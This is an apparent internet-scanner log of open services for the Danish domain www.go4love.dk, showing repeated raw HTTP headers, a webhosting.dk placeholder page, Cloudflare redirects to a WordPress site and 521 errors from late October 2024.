HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 06:17:35 GMT Content-Type: text/html Content-Length: 830 Connection: close X-Powered-By: PHP/5.2.17 Vary: Accept-Encoding Server: Apache 2.2 Page title: Hjemmeside hosting - Webhosting.dk www.go4love.dk <html> <head> <style type="text/css"> h1 {color:black; font-family : Verdana, Arial;font-size : 22px;} h2 {color:black; font-family : Verdana, Arial;font-size : 21px;} h3 {color:black; font-family : Verdana, Arial;font-size : 20px;} </style> </head> <body> <title>Hjemmeside hosting - Webhosting.dk www.go4love.dk</title> <center> <br> <font face='verdana,arial' size='4'>Vi hoster http://www.go4love.dk<br><br> Contact owner using this address: <a href='https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk' target=_blank><b>https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk</b></a><br><br> <center><font face='verdana,arial'>This domain is hosted with <a href='https://www.webhosting.dk?fromdomain=www.go4love.dk'><b><font face='verdana,arial'>https://www.webhosting.dk</b></a> </body> </html>
Open service 188.114.97.3:443 · www.go4love.dk
2024-10-31 00:29
HTTP/1.1 301 Moved Permanently Date: Thu, 31 Oct 2024 00:29:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-redirect-by: WordPress location: https://go4love.dk/ vary: User-Agent x-turbo-charged-by: LiteSpeed cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tc9cGjZY1kTE1LsmjKW2Ot0tGieM6ogU06fBN%2BxwD8oHfatALIY2MO92F3LSH%2BdxxKjM9Bf%2Fyflvu5RgVRhbJC9WPKpaxfnUfbsPhqAC4Qa2np2se0horQmXt592fDxyhA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8daf885ffde1aaf2-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=780&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3093&recv_bytes=560&delivery_rate=5619663&cwnd=229&unsent_bytes=0&cid=aeb137645507be10&ts=385&x=0"
Open service 81.19.232.105:80 · www.go4love.dk
2024-10-30 13:44
HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 13:44:55 GMT Content-Type: text/html Content-Length: 830 Connection: close X-Powered-By: PHP/5.2.17 Vary: Accept-Encoding Server: Apache Page title: Hjemmeside hosting - Webhosting.dk www.go4love.dk <html> <head> <style type="text/css"> h1 {color:black; font-family : Verdana, Arial;font-size : 22px;} h2 {color:black; font-family : Verdana, Arial;font-size : 21px;} h3 {color:black; font-family : Verdana, Arial;font-size : 20px;} </style> </head> <body> <title>Hjemmeside hosting - Webhosting.dk www.go4love.dk</title> <center> <br> <font face='verdana,arial' size='4'>Vi hoster http://www.go4love.dk<br><br> Contact owner using this address: <a href='https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk' target=_blank><b>https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk</b></a><br><br> <center><font face='verdana,arial'>This domain is hosted with <a href='https://www.webhosting.dk?fromdomain=www.go4love.dk'><b><font face='verdana,arial'>https://www.webhosting.dk</b></a> </body> </html>
Open service 81.19.232.105:443 · www.go4love.dk
2024-10-30 13:26
HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 13:26:49 GMT Content-Type: text/html Content-Length: 830 Connection: close X-Powered-By: PHP/5.2.17 Vary: Accept-Encoding Server: Apache 2.2 Page title: Hjemmeside hosting - Webhosting.dk www.go4love.dk <html> <head> <style type="text/css"> h1 {color:black; font-family : Verdana, Arial;font-size : 22px;} h2 {color:black; font-family : Verdana, Arial;font-size : 21px;} h3 {color:black; font-family : Verdana, Arial;font-size : 20px;} </style> </head> <body> <title>Hjemmeside hosting - Webhosting.dk www.go4love.dk</title> <center> <br> <font face='verdana,arial' size='4'>Vi hoster http://www.go4love.dk<br><br> Contact owner using this address: <a href='https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk' target=_blank><b>https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk</b></a><br><br> <center><font face='verdana,arial'>This domain is hosted with <a href='https://www.webhosting.dk?fromdomain=www.go4love.dk'><b><font face='verdana,arial'>https://www.webhosting.dk</b></a> </body> </html>
Open service 188.114.97.3:80 · www.go4love.dk
2024-10-29 02:34
HTTP/1.1 301 Moved Permanently Date: Tue, 29 Oct 2024 02:34:55 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close location: https://www.go4love.dk/ vary: User-Agent x-turbo-charged-by: LiteSpeed cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UvqVbUnu%2BGnrdZaSI1B8PP7pzGwk%2FpBd4XRFmQMPKL1fLqRIr3xpRE0ietXl24CuYp6VipbN56%2FdAlGRzgJesp7I9OOlUoEk2nQo%2BP9HwdJch%2FP1A6D8N1YiFLT1tmNAXA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9fc4ef2bb63cec-CDG alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=121751&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=212&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Page title: 301 Moved Permanently <!DOCTYPE html> <html style="height:100%"> <head> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /> <title> 301 Moved Permanently </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head> <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"> <div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1> <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently </h2> <p>The document has been permanently moved.</p> </div></div></body></html>
Open service 2a06:98c1:3121::9:8443 · www.go4love.dk
2024-10-29 02:34
HTTP/1.1 521 Date: Tue, 29 Oct 2024 02:35:06 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YKv32bVajw%2BfNzb2fYwAKvCDlJsKQhmKTyX0kbebhAankGJTjIS4g8YjoVIRD3DRtn1DfgTyd8E%2FHp26%2FfpTpHY5J05yrcWz%2BSBSFlrrpJZKlIqMAZzA9HWlvkwsAYO%2Fpttmg8r2XkYKUkXbJg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8d9fc533add1912b-FRA alt-svc: h3=":8443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=12595&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3093&recv_bytes=557&delivery_rate=255755&cwnd=252&unsent_bytes=0&cid=ef1e89ec8604aebe&ts=803&x=0" error code: 521
Open service 2a06:98c1:3120::9:80 · www.go4love.dk
2024-10-29 02:34
HTTP/1.1 301 Moved Permanently Date: Tue, 29 Oct 2024 02:34:55 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close location: https://www.go4love.dk/ vary: User-Agent x-turbo-charged-by: LiteSpeed cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AJMiGzWU5%2FVcQd5EHAeOmyctvf9eZXdNzYFouNLLsTN9YN77%2F%2Bt3j01y%2FpHUfKN7B4S%2FVGo6CcZ%2FNgOgSla0Tgqb6WmwMy%2B5MMSkvN8BtYp8cyvMfCrscZoDWXoF6nq8K%2BhBrZR1%2F22OD4HiIg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9fc4eddc65aba8-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=21773&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=209&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Page title: 301 Moved Permanently <!DOCTYPE html> <html style="height:100%"> <head> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /> <title> 301 Moved Permanently </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head> <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"> <div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1> <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently </h2> <p>The document has been permanently moved.</p> </div></div></body></html>
Open service 2a06:98c1:3120::9:8443 · www.go4love.dk
2024-10-29 02:34
HTTP/1.1 521 Date: Tue, 29 Oct 2024 02:34:55 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BqNBkXygXla3k%2F580NpBuvdue3R%2Fo8zAnALaZeGeNd92LK2qUlhYX1yCdugkWarZ8b46pTBrEw3zpaNOWu64AHbDKKjN69Jk0xREeLyBADVfZ33gxXoRAoVmosYuyNC8S6LlF8OZIICO6jma%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8d9fc4f0c8b3d3f4-CDG alt-svc: h3=":8443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=93054&sent=5&recv=7&lost=0&retrans=0&sent_bytes=3092&recv_bytes=557&delivery_rate=43054&cwnd=68&unsent_bytes=0&cid=1a599c96252a3106&ts=126&x=0" error code: 521
Open service 2a06:98c1:3121::9:443 · www.go4love.dk
2024-10-29 02:34
HTTP/1.1 301 Moved Permanently Date: Tue, 29 Oct 2024 02:34:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-redirect-by: WordPress location: https://go4love.dk/ vary: User-Agent x-turbo-charged-by: LiteSpeed cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=800zCgTsgoGe393ozNA215%2Bocu3jgximb2%2B7MApjEeoT0TB1ETBp%2F4%2BXj4dhNZ50htIug2jk3ElKM1U%2BRLQ90S6X1agDtLvct2oNlA2KSitcJNS2LMROACJeBhbDp461S5CaxOzYzkilaHTt8w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9fc4ede8f27740-AMS alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=876&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3092&recv_bytes=557&delivery_rate=3822306&cwnd=252&unsent_bytes=0&cid=b19cbf4a787c5d97&ts=139&x=0"
Open service 188.114.97.3:443 · www.go4love.dk
2024-10-29 02:34
HTTP/1.1 301 Moved Permanently Date: Tue, 29 Oct 2024 02:34:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-redirect-by: WordPress location: https://go4love.dk/ vary: User-Agent x-turbo-charged-by: LiteSpeed cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bew5siz5fwkDBiKgbzOYxtDmB5kn5ypDMSXqlTlGS8ZO13gyU1lMVnoDSzG0YSIgUmrF3I%2FJXf8Io8G7ge3VDPLkbabco8U2Vk1nFjong6%2FIL7IiRQ3J3CI4Z9IQh6BH%2BA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9fc4f47d8765b1-FRA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=17836&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3093&recv_bytes=560&delivery_rate=332186&cwnd=249&unsent_bytes=0&cid=9ff7ba787c703d2c&ts=135&x=0"
Open service 2a06:98c1:3120::9:443 · www.go4love.dk
2024-10-29 02:34
HTTP/1.1 301 Moved Permanently Date: Tue, 29 Oct 2024 02:34:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-redirect-by: WordPress location: https://go4love.dk/ vary: User-Agent x-turbo-charged-by: LiteSpeed cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g4nKKXAf8Egf%2Bz1UqBb6nFw3XsLrHzX3co4vsqFTuWk4%2F0y7C0H8MwIDJe0Zc50Ihzf3uMORNvTrThfKGfMSiDahjXXiKtI8%2FPsSvDxT%2FrezH52a00lVojiaz%2BgZNXPwnQJiKWRi53ejhCHI1w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9fc4f43a4c71b8-FRA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=23830&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3093&recv_bytes=557&delivery_rate=175551&cwnd=252&unsent_bytes=0&cid=8ebd19d999e9c222&ts=205&x=0"
Open service 2a06:98c1:3121::9:80 · www.go4love.dk
2024-10-29 02:34
HTTP/1.1 301 Moved Permanently Date: Tue, 29 Oct 2024 02:34:54 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close location: https://www.go4love.dk/ vary: User-Agent x-turbo-charged-by: LiteSpeed cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VwFRBTBayLTUCMAEwhGf6HiBthCP%2B9laxxstCZ%2B4EgHOPxrMWYFMpSLvSuS87AofjB9DidEXDhi6ZZ%2FGo2bBpWcM%2FmlWE93QG3LyXBTLrbWhfvp8tCSohOBM5eO3JcP%2BD%2B1xgUrMyo%2BCGrXTtQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9fc4ec38c02a6d-CDG alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=40196&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=209&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Page title: 301 Moved Permanently <!DOCTYPE html> <html style="height:100%"> <head> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /> <title> 301 Moved Permanently </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head> <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"> <div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1> <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently </h2> <p>The document has been permanently moved.</p> </div></div></body></html>
Open service 188.114.97.3:8443 · www.go4love.dk
2024-10-29 02:34
HTTP/1.1 521 Date: Tue, 29 Oct 2024 02:34:54 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gRTxkN4proWACKxebZlXDWRjotytq4Mb1PyO0Sv%2Bi%2Buf1E1Q0edDmo8XxeYWjwFpd5Yz4f1mKQQJ8ECaDxeQumn2Q4NVESJp90fuHOyOK6LzOqF1xQU1MjH%2FszDxjQ39WA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8d9fc4eb8c5566f6-AMS alt-svc: h3=":8443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1573&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3093&recv_bytes=560&delivery_rate=3370054&cwnd=136&unsent_bytes=0&cid=ecca140c2ba1b99b&ts=30&x=0" error code: 521
Open service 2a06:98c1:3121::3:8443 · www.go4love.dk
2024-10-28 14:04
HTTP/1.1 521 Date: Mon, 28 Oct 2024 14:04:28 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u4T7J%2B4WW3alLVsg%2BUF6DnST4GS6bJE2%2B%2B%2FEMPMRkjk2n%2B%2FbhfGYgHvhFngsvmb2q%2FnE05hE8HmppkbOg%2BEx4yUflTMGwhKW0%2F5njdXULOl2v5RiuG6EXLJ5%2FeEteqmDAPyvl3leMsIs5qisYw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8d9b79a76bbcb894-AMS alt-svc: h3=":8443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1466&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4442&recv_bytes=557&delivery_rate=245046&cwnd=252&unsent_bytes=0&cid=4e2f1b750f2ef99b&ts=238&x=0" error code: 521
Open service 2a06:98c1:3120::3:8443 · www.go4love.dk
2024-10-28 14:04
HTTP/1.1 521 Date: Mon, 28 Oct 2024 14:04:28 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QONQUzAP%2BSzw5pnIJz1losHuQvRqvvckvjB98L18g2Qh7ttGyTarWYHfTvKqrOlz82DoDMvQ%2B09i%2FC6sxiPVN99MDayzlyoDovH7fHtsAxCZkgt96XquOBTX64qm%2BjWLc7ySeohsw3XrDrdIxA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8d9b79a74ba99f93-AMS alt-svc: h3=":8443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1070&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3093&recv_bytes=557&delivery_rate=3976401&cwnd=252&unsent_bytes=0&cid=848070a646d36fbe&ts=223&x=0" error code: 521
Open service 2a06:98c1:3121::3:80 · www.go4love.dk
2024-10-28 14:04
HTTP/1.1 301 Moved Permanently Date: Mon, 28 Oct 2024 14:04:19 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close location: https://www.go4love.dk/ vary: User-Agent x-turbo-charged-by: LiteSpeed cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hskln8LQWrOQivSpSkamlEHVxUVQkoNDXb3zsgrWDIk5Aq1w6qPmRYxory9q%2FHKWXmjpf6CL7%2BFwgO%2BToGEcGuE8ups2RxhpyuXBHTUboiFCUvduNDwJ%2FdZAElNnAc8UvlFGVXjmY2RYv0JKbg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9b796b3fde65c3-FRA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=744&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=209&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Page title: 301 Moved Permanently <!DOCTYPE html> <html style="height:100%"> <head> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /> <title> 301 Moved Permanently </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head> <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"> <div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1> <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently </h2> <p>The document has been permanently moved.</p> </div></div></body></html>
Open service 2a06:98c1:3120::3:80 · www.go4love.dk
2024-10-28 14:04
HTTP/1.1 301 Moved Permanently Date: Mon, 28 Oct 2024 14:04:19 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close location: https://www.go4love.dk/ vary: User-Agent x-turbo-charged-by: LiteSpeed cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MquqqMyvUoRFHt5cdlePmeGtejFHdELBgCWqvvK%2Fn27AgZM3XEwk4412zChMWQIrmMME%2BKTGJwhGAbuegm8EtBw6%2BlhQC6OLzrFwGE5fdHx9XXuE9FeEHQsCc2eZuvy7bn9gy4Y3Vj19%2B%2FG3pA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9b796a9d0edcb2-FRA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=774&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=209&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Page title: 301 Moved Permanently <!DOCTYPE html> <html style="height:100%"> <head> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /> <title> 301 Moved Permanently </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head> <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"> <div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1> <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently </h2> <p>The document has been permanently moved.</p> </div></div></body></html>
Open service 188.114.97.3:80 · www.go4love.dk
2024-10-28 14:04
HTTP/1.1 301 Moved Permanently Date: Mon, 28 Oct 2024 14:04:13 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close location: https://www.go4love.dk/ vary: User-Agent x-turbo-charged-by: LiteSpeed cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9U29EFByKCH2i%2BZYAzz05ARtK5UwXqMnZ7KhXpgowSsde9UD5OKI6mFf6mLSOCE2Yspouy02JNG32AyjVwOdlNTLmt5D9HL%2BIoX2MHXU6277kUwZYNT4WG3Wc7Nz7nrl7A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9b7947c98a3d10-CDG alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=31546&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=212&delivery_rate=0&cwnd=65&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Page title: 301 Moved Permanently <!DOCTYPE html> <html style="height:100%"> <head> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /> <title> 301 Moved Permanently </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head> <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"> <div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1> <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently </h2> <p>The document has been permanently moved.</p> </div></div></body></html>
Open service 188.114.97.3:8443 · www.go4love.dk
2024-10-28 14:04
HTTP/1.1 521 Date: Mon, 28 Oct 2024 14:04:13 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wZyW5Eid90mgJIU%2FOz70dr8mblF9usUAryHDhJyzTqAj4khwN7m4i83l7oKSK1TRbjBeo6zaH5al%2BqseprZweqyJwqHBOs4CMOdndufgQUX%2Fwb%2B7b2yuuK4%2FE7POZxopOA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8d9b7949ba6f52db-LHR alt-svc: h3=":8443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=27014&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3093&recv_bytes=560&delivery_rate=122736&cwnd=223&unsent_bytes=0&cid=ef0ee527a9a4e4d3&ts=79&x=0" error code: 521
Open service 188.114.97.3:443 · www.go4love.dk
2024-10-28 14:04
HTTP/1.1 301 Moved Permanently Date: Mon, 28 Oct 2024 14:04:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-redirect-by: WordPress location: https://go4love.dk/ vary: User-Agent x-turbo-charged-by: LiteSpeed cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i8txtt1hBNCbdqh1FcGrsmuXOnB5tYvgzmuYaNzhwTLQrpy4l6YrBv5LUswDeD3aGVXLwvplTy1np7g6MqQTzvy6gEwBQuWkDtpvJO99RRuKIP6nZ4q%2FIgI48DJL7x89ig%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9b794aea32731e-LHR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=24745&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3094&recv_bytes=560&delivery_rate=175649&cwnd=210&unsent_bytes=0&cid=942d6014ce7820bc&ts=531&x=0"
Open service 188.114.97.3:443 · www.go4love.dk
2024-10-22 07:06
HTTP/1.1 301 Moved Permanently Date: Tue, 22 Oct 2024 07:06:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-redirect-by: WordPress location: https://go4love.dk/ vary: User-Agent x-turbo-charged-by: LiteSpeed cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OoKFHC0SD5W3ZkDFH%2B6HcSv48Y6c99gC1eeBWmuIOT9S26k0zxYeDx2aP9Pa%2BVmWwRCsVNCZfWitkKEBw9S%2FZov%2Bj4MGb1NxqsHXf%2BsX%2BVugmk7OvICNyi7tk5sRVpe4Uw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d67a481dd39371c-FRA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1043&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3093&recv_bytes=560&delivery_rate=4156937&cwnd=251&unsent_bytes=0&cid=44e18d1a0bc35436&ts=1238&x=0"
Open service 81.19.232.105:80 · www.go4love.dk
2024-10-22 06:54
HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 06:54:19 GMT Content-Type: text/html Content-Length: 830 Connection: close X-Powered-By: PHP/5.2.17 Vary: Accept-Encoding Server: Apache Page title: Hjemmeside hosting - Webhosting.dk www.go4love.dk <html> <head> <style type="text/css"> h1 {color:black; font-family : Verdana, Arial;font-size : 22px;} h2 {color:black; font-family : Verdana, Arial;font-size : 21px;} h3 {color:black; font-family : Verdana, Arial;font-size : 20px;} </style> </head> <body> <title>Hjemmeside hosting - Webhosting.dk www.go4love.dk</title> <center> <br> <font face='verdana,arial' size='4'>Vi hoster http://www.go4love.dk<br><br> Contact owner using this address: <a href='https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk' 